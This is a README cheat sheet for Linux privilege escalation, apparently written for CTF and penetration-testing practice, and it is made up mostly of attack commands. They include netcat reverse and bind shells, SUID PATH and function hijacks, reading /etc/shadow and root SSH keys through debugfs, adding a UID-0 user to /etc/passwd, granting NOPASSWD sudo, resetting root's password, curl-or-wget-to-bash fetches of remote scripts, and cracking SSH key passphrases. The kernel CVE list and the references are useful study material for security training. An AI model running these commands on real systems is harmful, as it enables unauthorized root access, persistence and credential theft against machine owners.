[ { "path": "README.md", "content": "# Linux-Privilege-Escalation\nTips and Tricks for Linux Priv Escalation\n\nFix the Shell:\n```\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\nCtrl-Z\n\n# In Kali Note the number of rows and cols in the current terminal window\n$ stty -a \n\n# Next we will enable raw echo so we can use TAB autocompletes \n$ stty raw -echo\n$ fg\n\n# In reverse shell\n$ stty rows columns \n \n# Finally\n$ reset\n$ export SHELL=bash\n$ export TERM=xterm-256color\n```\n\n## Start with the basics\n\nWho am i and what groups do I belong to? \n`id`\n\nWho else is on this box (lateral movement)? \n`ls -la /home` \n`cat /etc/passwd` \n\nWhat Kernel version and distro are we working with here? \n`uname -a` \n`cat /etc/issue` \n\nWhat new processes are running on the server (Thanks to IPPSEC for the script!): \n``` \n#!/bin/bash\n\n# Loop by line\nIFS=$'\\n'\n\nold_process=$(ps aux --forest | grep -v \"ps aux --forest\" | grep -v \"sleep 1\" | grep -v $0)\n\nwhile true; do\n new_process=$(ps aux --forest | grep -v \"ps aux --forest\" | grep -v \"sleep 1\" | grep -v $0)\n diff <(echo \"$old_process\") <(echo \"$new_process\") | grep [\\<\\>]\n sleep 1\n old_process=$new_process\ndone\n```\n\nWe can also use pspy on linux to monitor the processes that are starting up and running: \nhttps://github.com/DominicBreuker/pspy\n\nCheck the services that are listening:\n```bash\nss -lnpt\n```\n\n\n## What can we EXECUTE?\n\nWho can execute code as root (probably will get a permission denied)? \n`cat /etc/sudoers`\n\nCan I execute code as root (you will need the user's password)? \n`sudo -l`\n\nWhat executables have SUID bit that can be executed as another user? \n`find / -type f -user root -perm /u+s -ls 2>/dev/null` \n`find / -user root -perm -4000 -print 2>/dev/null` \n`find / -perm -u=s -type f 2>/dev/null` \n`find / -user root -perm -4000 -exec ls -ldb {} \\;` \n\nDo any of the SUID binaries run commands that are vulnerable to file path manipulation? \n`strings /usr/local/bin/binaryelf` \n`mail` \n`echo \"/bin/sh\" > /tmp/mail` \n`cd /tmp` \n`export PATH=.` \n`/usr/local/bin/binaryelf` \n\nDo any of the SUID binaries run commands that are vulnerable to Bash Function Manipulation?\n`strings /usr/bin/binaryelf` \n`mail`\n`function /usr/bin/mail() { /bin/sh; }` \n`export -f /usr/bin/mail` \n`/usr/bin/binaryelf` \n\nCan I write files into a folder containing a SUID bit file? \nMight be possible to take advantage of a '.' in the PATH or an The IFS (or Internal Field Separator) Exploit. \n\nIf any of the following commands appear on the list of SUID or SUDO commands, they can be used for privledge escalation:\n\n| SUID / SUDO Executables | Priv Esc Command (will need to prefix with sudo if you are using sudo for priv esc. |\n|---------------------------------------|-------------------------------------------------------------------------------------|\n| (ALL : ALL ) ALL | You can run any command as root.
sudo su -
sudo /bin/bash |\n| nmap
(older versions 2.02 to 5.21) | nmap --interactive
!sh |\n| netcat
nc
nc.traditional | nc -nlvp 4444 &
nc -e /bin/bash 127.0.0.1 4444 |\n| ncat | |\n| awk
gawk | awk '{ print }' /etc/shadow
awk 'BEGIN {system(\"id\")}' |\n| python | python -c 'import pty;pty.spawn(\"/bin/bash\")' |\n| php | |\n| find | find /home -exec nc -lvp 4444 -e /bin/bash \\\\;
find /home -exec /bin/bash \\\\; |\n| xxd | |\n| vi | |\n| more | |\n| less | |\n| nano | |\n| cp | |\n| cat | |\n| bash | |\n| ash | |\n| sh | |\n| csh | |\n| curl | |\n| dash | |\n| pico | |\n| nano | |\n| vrim | |\n| tclsh | |\n| git | |\n| scp | |\n| expect | |\n| ftp | |\n| socat | |\n| script | |\n| ssh | |\n| zsh | |\n| tclsh | |\n| strace | Write and compile a a SUID SUID binary c++ program
strace chown root:root suid
strace chmod u+s suid
./suid |\n| npm | ln -s /etc/shadow package.json && sudo /usr/bin/npm i * |\n| rsync | |\n| tar | |\n|Screen-4.5.00 \t\t\t\t| https://www.exploit-db.com/exploits/41154/\t\t\t\t\t |\n\n*Note:* You can find an incredible list of Linux binaries that can lead to privledge escalation at the GTFOBins project website here: \nhttps://gtfobins.github.io/\n\n\nCan I access services that are running as root on the local network? \n`netstat -antup` \n`ps -aux | grep root` \n\n| Network Services Running as Root | Exploit actions |\n|---------------------------------------|-------------------------------------------------------------------------------------|\n| mysql | raptor_udf2 exploit
0xdeadbeef.info/exploits/raptor_udf2.c
insert into foo values(load_file('/home/smeagol/raptor_udf2.so')); |\n| apache \t\t\t | drop a reverse shell script on to the webserver |\n| nfs\t \t\t\t | no_root_squash parameter
Or
if you create the same user name and matching user id as the remote share you can gain access to the files and write new files to the share |\n| PostgreSQL | https://www.exploit-db.com/exploits/45184/ |\n\n\nAre there any active tmux sessions we can connect to? \n`tmux ls` \n\n## What can we READ?\nWhat files and folders are in my home user's directory? \n`ls -la ~` \n\nDo any users have passwords stored in the passwd file?\n`cat /etc/passwd` \n\nAre there passwords for other users or RSA keys for SSHing into the box? \n`ssh -i id_rsa root@10.10.10.10` \n\nAre there configuration files that contain credentials?\n\n| Application and config file | Config File Contents |\n|---------------------------------------|-------------------------------------------------------------------------------------|\n| WolfCMS
config.php | // Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
|\n| Generic PHP Web App | define('DB_PASSWORD', 's3cret'); |\n| .ssh directory \t\t | authorized_keys
id_rsa
id_rsa.keystore
id_rsa.pub
known_hosts |\n| User MySQL Info\t | .mysql_history
.my.cnf\t\t\t\t\t\t |\n| User Bash History \t | .bash_history \t\t\t\t\t |\n\nAre any of the discovered credentials being reused by multiple acccounts? \n`sudo - username` \n`sudo -s` \n\nAre there any Cron Jobs Running? \n`cat /etc/crontab` \n\nWhat files have been modified most recently? \n`find /etc -type f -printf '%TY-%Tm-%Td %TT %p\\n' | sort -r` \n`find /home -type f -mmin -60` \n`find / -type f -mtime -2` \n\nIs the user a member of the Disk group and can we read the contents of the file system? \n`debugfs /dev/sda` \n`debugfs: cat /root/.ssh/id_rsa` \n`debugfs: cat /etc/shadow` \n\nIs the user a member of the Video group and can we read the Framebuffer? \n`cat /dev/fb0 > /tmp/screen.raw` \n`cat /sys/class/graphics/fb0/virtual_size` \n\n## Where can we WRITE?\n\nWhat are all the files can I write to? \n`find / -type f -writable -path /sys -prune -o -path /proc -prune -o -path /usr -prune -o -path /lib -prune -o -type d 2>/dev/null` \n\nWhat folder can I write to? \n`find / -regextype posix-extended -regex \"/(sys|srv|proc|usr|lib|var)\" -prune -o -type d -writable 2>/dev/null` \n\n| Writable Folder / file | Priv Esc Command |\n|---------------------------|-------------------------------------------------------------------------------------------------|\n| /home/*USER*/ | Create an ssh key and copy it to the .ssh/authorized_keys folder the ssh into the account |\n| /etc/passwd | manually add a user with a password of \"password\" using the following syntax
user:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:1000:1000:,,,:/home/user:/bin/bash
You can even escalate to the root user in some cases with the following syntax:
admin:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:0:0:,,,:/root:/bin/bash |\n\n\n*Root SSH Key* If Root can login via SSH, then you might be able to find a method of adding a key to the /root/.ssh/authorized_keys file. \n```\ncat /etc/ssh/sshd_config | grep PermitRootLogin\n``` \n*Add SUDOers* If we can write arbitrary files to the host as Root, it is possible to add users to the SUDO-ers group like so (NOTE: you will need to logout and login again as myuser): \n/etc/sudoers \n```\nroot ALL=(ALL:ALL) ALL\n%sudo ALL=(ALL:ALL) ALL\nmyuser\tALL=(ALL) NOPASSWD:ALL \n```\n*Set Root Password* We can also change the root password on the host if we can write to any file as root: \n/etc/shadow \n```\nprintf root:>shadown\nopenssl passwd -1 -salt salty password >>shadow\n```\n\n## Kernel Exploits\n\nBased on the Kernel version, do we have some reliable exploits that can be used?\n\nUDEV - Linux Kernel < 2.6 & UDEV < 1.4.1 - CVE-2009-1185 - April 2009 \n\n\tUbuntu 8.10 \n\tUbunto 9.04 \n\tGentoo \n\nRDS - Linux Kernel <= 2.6.36-rc8 - CVE-2010-3904 - Linux Exploit -\n\n\tCentos 4/5\n\nperf_swevent_init - Linux Kernel < 3.8.9 (x86-64) - CVE-2013-2094 - June 2013 \n\t\n\tUbuntu 12.04.2 \n\nmempodipper - Linux Kernel 2.6.39 < 3.2.2 (x86-64) - CVE-2012-0056 - January 2012 \n \n Ubuntu 11.10\n Ubuntu 10.04 \n Redhat 6 \n Oracle 6 \n\nDirty Cow - Linux Kernel 2.6.22 < 3.2.0/3.13.0/4.8.3 - CVE-2016-5195 - October 2016\n\n\tUbuntu 12.04\n\tUbuntu 14.04\n\tUbuntu 16.04\n\t\nKASLR / SMEP - Linux Kernel < 4.4.0-83 / < 4.8.0-58 - CVE-2017-1000112 - August 2017\n\n\tUbuntu 14.04\n\tUbuntu 16.04\n\t\n\n\t\nGreat list here:\nhttps://github.com/lucyoa/kernel-exploits\n\n## Automated Linux Enumeration Scripts\nIt is always a great idea to automate the enumeration process once you understand what you are looking for.\n\n### LinEmum.sh\nLinEnum is a handy method of automating Linux enumeration. It is also written as a shell script and does not require any other intpreters (Python,PERL etc.) which allows you to run it file-lessly in memory.\n\nFirst we need to git a copy to our local Kali linux machine:\n```\ngit clone https://github.com/rebootuser/LinEnum.git\n```\nNext we can serve it up in the python simple web server:\n```\nroot@kali:~test# cd LinEnum/\nroot@kali:~test/LinEnum# ls\nroot@kali:~test/LinEnum# python -m SimpleHTTPServer 80\nServing HTTP on 0.0.0.0 port 80 ...\n```\nAnd now on our remote Linux machine we can pull down the script and pipe it directly to Bash:\n```\nwww-data@vulnerable:/var/www$ curl 10.10.10.10/LinEnum.sh | bash\n```\nAnd the enumeration script should run on the remote machine.\n\n## CTF Machine Tactics\n\nOften it is easy to identify when a machine was created by the date / time of file edits.\nWe can create a list of all the files with a modify time in that timeframe with the following command:\n```\nfind -L / -type f -newermt 2019-08-24 ! -newermt 2019-08-27 2>&1 > /tmp/foundfiles.txt\n```\nThis has helped me to find interesting files on a few different CTF machines.\n\nRecursively searching for passwords is also a handy technique:\n```\ngrep -ri \"passw\" .\n```\n\nWget Pipe a remote URL directory to Bash (linpeas):\n```\nwget -q -O - \"http://10.10.10.10/linpeas.sh\" | bash\n```\n\nCurl Pipe a remote URL directly to Bash (linpeas):\n```\ncurl -sSk \"http://10.10.10.10/linpeas.sh\" | bash\n```\n\n## Using SSH Keys\nOften, we are provided with password protected SSH keys on CTF boxes. It it helpful to be able to quicky crack and add these to your private keys.\n\nFirst we need to convert the ssh key using John:\n```\nkali@kali:~/.ssh$ /usr/share/john/ssh2john.py ./id_rsa > ./id_rsa_john\n...\n```\n\nNext we will need to use that format to crack the password:\n```\n/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ./id_rsa_john\n```\n\nJohn should output a password for the private key.\n\n```\n\n```\n\n\n## References\n\nhttps://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ \nhttp://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/ \nhttps://payatu.com/guide-linux-privilege-escalation/ \nhttp://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/ \nhttp://www.0daysecurity.com/penetration-testing/enumeration.html \nhttps://www.rebootuser.com/?p=1623#.V0W5Pbp95JP \nhttps://www.doomedraven.com/2013/04/hacking-linux-part-i-privilege.html \nhttps://securism.wordpress.com/oscp-notes-privilege-escalation-linux/ \nhttps://haiderm.com/linux-privilege-escalation-using-weak-nfs-permissions/ \nhttp://hackingandsecurity.blogspot.com/2016/06/exploiting-network-file-system-nfs.html \nhttps://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt \nhttps://hkh4cks.com/blog/2017/12/30/linux-enumeration-cheatsheet/ \nhttps://digi.ninja/blog/when_all_you_can_do_is_read.php \nhttps://medium.com/@D00MFist/vulnhub-lin-security-1-d9749ea645e2 \nhttps://gtfobins.github.io/ \nhttps://github.com/rebootuser/LinEnum\n\n" } ]